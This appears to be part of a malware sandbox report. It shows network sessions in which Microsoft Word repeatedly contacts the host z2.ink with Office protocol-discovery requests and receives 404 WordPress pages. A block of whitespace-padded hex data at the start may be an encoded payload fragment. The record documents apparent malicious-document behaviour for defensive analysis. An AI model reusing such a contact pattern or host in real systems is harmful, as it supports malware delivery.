                                May 28, 2024 09:30:00.678798914 CEST1236INData Raw: 20 20 20 20 20 20 20 20 37 38 30 09 20 09 20 09 20 20 09 20 09 20 20 20 09 20 20 20 20 20 20 20 20 20 35 62 33 0a 0d 0a 0a 0d 0a 0d 0a 33 66 20 20 20 09 09 20 20 09 20 09 20 20 20 09 20 20 20 20 20 20 20 20 20 32 66 38 37 66 0a 0a 0a 0a 0d 0a 0d
                                Data Ascii: 780 5b33f 2f87ffe 0 1 186 2162 8f 4
                                May 28, 2024 09:30:00.678833008 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 09 09 20 09 09 09 20 20 20 34 39 64 20 09 20 09 20 20 20 20 20 20 20 20 20 20 09 09 20 09 09 09 20 20 20 38 66 20 20 09 09 09 20 20 20 09 20 20 09 20 09 09 20 20 09 09 09 20 20 20 37 32 34 0d 0a 0d 0a 0a 0a 0a 0a 32
                                Data Ascii: 49d 8f 72428a5b11 b7 294fdc2 fde ddc
                                May 28, 2024 09:30:00.678868055 CEST1236INData Raw: 09 20 20 20 20 20 65 62 20 09 20 20 20 09 09 20 09 09 09 20 09 09 09 20 09 09 20 20 20 20 20 31 20 20 09 20 09 09 09 20 09 09 09 20 09 09 09 20 09 09 20 20 20 20 20 63 20 09 20 09 09 09 09 20 09 09 09 20 09 09 09 20 09 09 20 20 20 20 20 35 0d 0d
                                Data Ascii: eb 1 c 53 0 ac a3 1306e4c67 8e7
                                May 28, 2024 09:30:00.678900957 CEST1236INData Raw: 09 09 20 09 09 20 20 09 09 09 09 20 20 09 09 20 09 09 20 20 34 30 09 09 09 09 09 20 09 09 20 20 09 09 09 09 20 20 09 09 20 09 09 20 20 32 34 09 20 09 09 20 09 09 09 09 20 20 20 20 09 20 20 09 09 20 09 09 20 20 66 61 61 20 09 20 09 09 09 09 20 20
                                Data Ascii: 40 24 faa 650c 639 3a c 1df4
                                May 28, 2024 09:30:00.678937912 CEST1236INData Raw: 09 09 09 20 20 09 09 20 37 0a 0d 0d 0d 0a 0d 0d 0a 62 09 20 09 09 09 20 20 20 20 09 09 20 09 09 09 09 09 09 20 20 09 09 20 38 61 31 20 20 09 20 09 09 09 20 09 20 20 09 09 09 09 09 09 09 20 20 09 09 20 62 20 20 20 09 09 09 09 09 09 09 20 20 09 09
                                Data Ascii: 7b 8a1 b dda ec85 a1 83ecc1284 0
                                May 28, 2024 09:30:00.678976059 CEST1236INData Raw: 0a 0d 0a 0d 0a 32 36 0d 0d 0a 0a 0d 0a 0d 0a 34 33 0d 0a 0d 0a 0d 0a 0d 0a 32 35 20 09 20 20 20 09 09 09 20 20 09 20 20 09 09 20 20 09 09 09 20 09 20 65 09 20 20 09 09 09 09 09 20 20 09 20 20 09 09 20 20 09 09 09 20 09 20 64 0d 0a 0d 0a 0d 0a 0d
                                Data Ascii: 264325 e dbac718ce fbd9ca16 4 6 6f 7
                                May 28, 2024 09:30:00.683922052 CEST1236INData Raw: 20 09 32 65 35 31 20 20 09 09 20 09 20 09 20 20 09 09 20 20 09 20 09 09 20 20 20 20 09 66 33 34 0d 0d 0d 0d 0d 0d 0d 0a 61 37 37 20 20 09 09 20 20 20 20 20 20 09 09 20 20 09 20 09 09 20 20 20 20 09 64 0a 0d 0d 0a 0a 0d 0d 0a 33 63 62 36 09 09 09
                                Data Ascii: 2e51 f34a77 d3cb6 5 c8f2d 8 22 46ecb


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.224916554.241.153.192802504C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                TimestampBytes transferredDirectionData
                                May 28, 2024 09:30:01.249645948 CEST128OUTOPTIONS / HTTP/1.1
                                User-Agent: Microsoft Office Protocol Discovery
                                Host: z2.ink
                                Content-Length: 0
                                Connection: Keep-Alive
                                May 28, 2024 09:30:01.838568926 CEST1236INHTTP/1.1 404 Not Found
                                Content-Type: text/html; charset=utf-8
                                Edge: smart-1.high-performance.network
                                Date: Tue, 28 May 2024 07:30:01 GMT
                                Content-Length: 102317
                                Server: LINKSGPT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Connection: keep-alive
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><htmllang=en-US prefix="og: https://ogp.me/ns#"><head><style>img.lazy{min-height:1px}</style><linkrel=preload href=https://d3btrheyejmivy.cloudfront.net/edge/wp-content/plugins/w3-total-cache/pub/js/lazyload.min.js as=script><metacharset="UTF-8"><metahttp-equiv="X-UA-Compatible" content="IE=edge"><linkrel=pingback href=https://face.linksgpt.com/edge/xmlrpc.php> <script>document.documentElement.className = 'js';</script> <linkrel=preconnect href=https://fonts.gstatic.com crossorigin><style id=et-divi-open-sans-inline-css>/*<![CDATA[*//* Original: https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800&#038;subset=latin,latin-ext&#038;display=swap *//* User Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1 */@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 300;font-stretch: normal;font-display: swap;src: url
                                May 28, 2024 09:30:01.838713884 CEST1236INData Raw: 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38
                                Data Ascii: (https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;
                                May 28, 2024 09:30:01.838726997 CEST1236INData Raw: 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 53 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 76 57
                                Data Ascii: play: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsiH0B4uaVc.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;fon
                                May 28, 2024 09:30:01.838738918 CEST1236INData Raw: 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a 20 6e 6f 72
                                Data Ascii: ce {font-family: 'Open Sans';font-style: italic;font-weight: 300;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4exg.woff) format('woff');}@fo
                                May 28, 2024 09:30:01.838752985 CEST896INData Raw: 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a
                                Data Ascii: t-face {font-family: 'Open Sans';font-style: normal;font-weight: 300;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsiH0B4uaVQ.woff) format('woff');}@f
                                May 28, 2024 09:30:01.838766098 CEST1236INData Raw: 6d 53 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 76 57 62 58 32 76 56 6e 58 42 62 4f 62 6a 32 4f 56 5a 79 4f 4f 53 72 34 64 56 4a 57 55 67 73 67 2d 31 78 34 75 61 56 51 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66
                                Data Ascii: mSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsg-1x4uaVQ.woff) format('woff');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 800;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/
                                May 28, 2024 09:30:01.838777065 CEST1236INData Raw: 73 74 72 65 74 63 68 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76
                                Data Ascii: stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0RkyFjWV4ewA.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 80
                                May 28, 2024 09:30:01.838783979 CEST1236INData Raw: 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73
                                Data Ascii: font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsg-1x4uaVI.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight:
                                May 28, 2024 09:30:01.838793993 CEST1236INData Raw: 32 30 31 30 30 31 30 31 20 46 69 72 65 66 6f 78 2f 33 39 2e 30 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4d 6f 6e 6f 74 6f 6e 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74
                                Data Ascii: 20100101 Firefox/39.0 */@font-face {font-family: 'Monoton';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/monoton/v15/5h1aiZUrOngCibe4TkHLQg.woff2) format('woff2');}/*...*/</style><script>let jquery
                                May 28, 2024 09:30:01.838805914 CEST1236INData Raw: 74 61 0a 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 72 74 69 63 6c 65 22 3e 3c 6d 65 74 61 0a 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 6f 74 20 46 6f 75
                                Data Ascii: taproperty="og:type" content="article"><metaproperty="og:title" content="Not Found - Brandlink Edge"><metaproperty="og:url" content="https://face.linksgpt.com/edge/?p=28"><metaproperty="og:site_name" content="Brandlink Edge"><metaproperty
                                May 28, 2024 09:30:01.843709946 CEST1236INData Raw: 3a 22 65 6e 2d 55 53 22 7d 2c 7b 22 40 74 79 70 65 22 3a 22 57 65 62 50 61 67 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 66 61 63 65 2e 6c 69 6e 6b 73 67 70 74 2e 63 6f 6d 2f 65 64 67 65 2f 3f 70 3d 32 38 23 77 65 62 70 61 67 65 22 2c
                                Data Ascii: :"en-US"},{"@type":"WebPage","@id":"https://face.linksgpt.com/edge/?p=28#webpage","url":"https://face.linksgpt.com/edge/?p=28","name":"Not Found - Brandlink Edge","datePublished":"2023-07-06T03:34:22+00:00","dateModified":"2023-07-06T03:36:18+


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.224916654.241.153.192802504C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                TimestampBytes transferredDirectionData
                                May 28, 2024 09:30:02.437015057 CEST128OUTOPTIONS / HTTP/1.1
                                User-Agent: Microsoft Office Protocol Discovery
                                Host: z2.ink
                                Content-Length: 0
                                Connection: Keep-Alive
                                May 28, 2024 09:30:03.037555933 CEST1236INHTTP/1.1 404 Not Found
                                Content-Type: text/html; charset=utf-8
                                Edge: smart-1.high-performance.network
                                Date: Tue, 28 May 2024 07:30:02 GMT
                                Content-Length: 102317
                                Server: LINKSGPT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Connection: keep-alive
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><htmllang=en-US prefix="og: https://ogp.me/ns#"><head><style>img.lazy{min-height:1px}</style><linkrel=preload href=https://d3btrheyejmivy.cloudfront.net/edge/wp-content/plugins/w3-total-cache/pub/js/lazyload.min.js as=script><metacharset="UTF-8"><metahttp-equiv="X-UA-Compatible" content="IE=edge"><linkrel=pingback href=https://face.linksgpt.com/edge/xmlrpc.php> <script>document.documentElement.className = 'js';</script> <linkrel=preconnect href=https://fonts.gstatic.com crossorigin><style id=et-divi-open-sans-inline-css>/*<![CDATA[*//* Original: https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800&#038;subset=latin,latin-ext&#038;display=swap *//* User Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1 */@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 300;font-stretch: normal;font-display: swap;src: url
                                May 28, 2024 09:30:03.037606001 CEST224INData Raw: 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38
                                Data Ascii: (https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;
                                May 28, 2024 09:30:03.037791967 CEST1236INData Raw: 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69
                                Data Ascii: font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 600;font-stretch:
                                May 28, 2024 09:30:03.037905931 CEST1236INData Raw: 73 74 72 65 74 63 68 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76
                                Data Ascii: stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVc.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 600;
                                May 28, 2024 09:30:03.037923098 CEST1236INData Raw: 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 66 6f 6e 74 2d 77 65 69 67 68
                                Data Ascii: format('woff');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4exg.w
                                May 28, 2024 09:30:03.037938118 CEST1236INData Raw: 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67
                                Data Ascii: format('woff');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVQ.wof
                                May 28, 2024 09:30:03.037955046 CEST1236INData Raw: 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38 74 57 5a 30 50 77 38 36 68 64 30 52 6b 35 68 6b 57 56 34 65 77 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61
                                Data Ascii: ns/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4ewA.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s
                                May 28, 2024 09:30:03.037971020 CEST1236INData Raw: 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 53 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 76 57 62 58 32 76 56 6e 58 42 62 4f 62 6a 32 4f 56 5a 79 4f 4f 53 72 34 64 56 4a 57 55 67 73 69 48 30 42 34 75 61 56 49 2e 77
                                Data Ascii: c.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsiH0B4uaVI.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gs
                                May 28, 2024 09:30:03.037986994 CEST1236INData Raw: 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 20 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20
                                Data Ascii: &#038;subset=latin&#038;display=swap *//* User Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1 */@font-face {font-family: 'Monoton';font-style: normal;font-weight: 400;font-display: swap;s
                                May 28, 2024 09:30:03.038003922 CEST1236INData Raw: 75 65 72 79 2c 24 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 30 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 7d 2c 6a 51 75 65 72 79 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e
                                Data Ascii: uery,$=window.jQuery,customHeadScripts=!0,jQuery.noConflict},jQuery.ready=function(r){jqueryParams=[...jqueryParams,r]},$.ready=function(r){jqueryParams=[...jqueryParams,r]},jQuery.load=function(r){jqueryParams=[...jqueryParams,r]},$.load=func
                                May 28, 2024 09:30:03.042712927 CEST1236INData Raw: 65 74 61 0a 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 42 72 61 6e 64 6c 69 6e 6b 20 45 64 67 65 22 3e 3c 6d 65 74 61 0a 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a
                                Data Ascii: etaname="twitter:title" content="Not Found - Brandlink Edge"><metaname="twitter:label1" content="Written by"><metaname="twitter:data1" content="tianqi"><metaname="twitter:label2" content="Time to read"><metaname="twitter:data2" content="L


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                4192.168.2.224916754.241.153.192802504C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                TimestampBytes transferredDirectionData
                                May 28, 2024 09:30:03.052804947 CEST128OUTOPTIONS / HTTP/1.1
                                User-Agent: Microsoft Office Protocol Discovery
                                Host: z2.ink
                                Content-Length: 0
                                Connection: Keep-Alive
                                May 28, 2024 09:30:03.646497965 CEST1236INHTTP/1.1 404 Not Found
                                Content-Type: text/html; charset=utf-8
                                Edge: smart-1.high-performance.network
                                Date: Tue, 28 May 2024 07:30:03 GMT
                                Content-Length: 102317
                                Server: LINKSGPT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Connection: keep-alive
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><htmllang=en-US prefix="og: https://ogp.me/ns#"><head><style>img.lazy{min-height:1px}</style><linkrel=preload href=https://d3btrheyejmivy.cloudfront.net/edge/wp-content/plugins/w3-total-cache/pub/js/lazyload.min.js as=script><metacharset="UTF-8"><metahttp-equiv="X-UA-Compatible" content="IE=edge"><linkrel=pingback href=https://face.linksgpt.com/edge/xmlrpc.php> <script>document.documentElement.className = 'js';</script> <linkrel=preconnect href=https://fonts.gstatic.com crossorigin><style id=et-divi-open-sans-inline-css>/*<![CDATA[*//* Original: https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800&#038;subset=latin,latin-ext&#038;display=swap *//* User Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1 */@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 300;font-stretch: normal;font-display: swap;src: url
                                May 28, 2024 09:30:03.646553040 CEST1236INData Raw: 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38
                                Data Ascii: (https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;
                                May 28, 2024 09:30:03.646569967 CEST1236INData Raw: 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 53 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 76 57
                                Data Ascii: play: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsiH0B4uaVc.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;fon
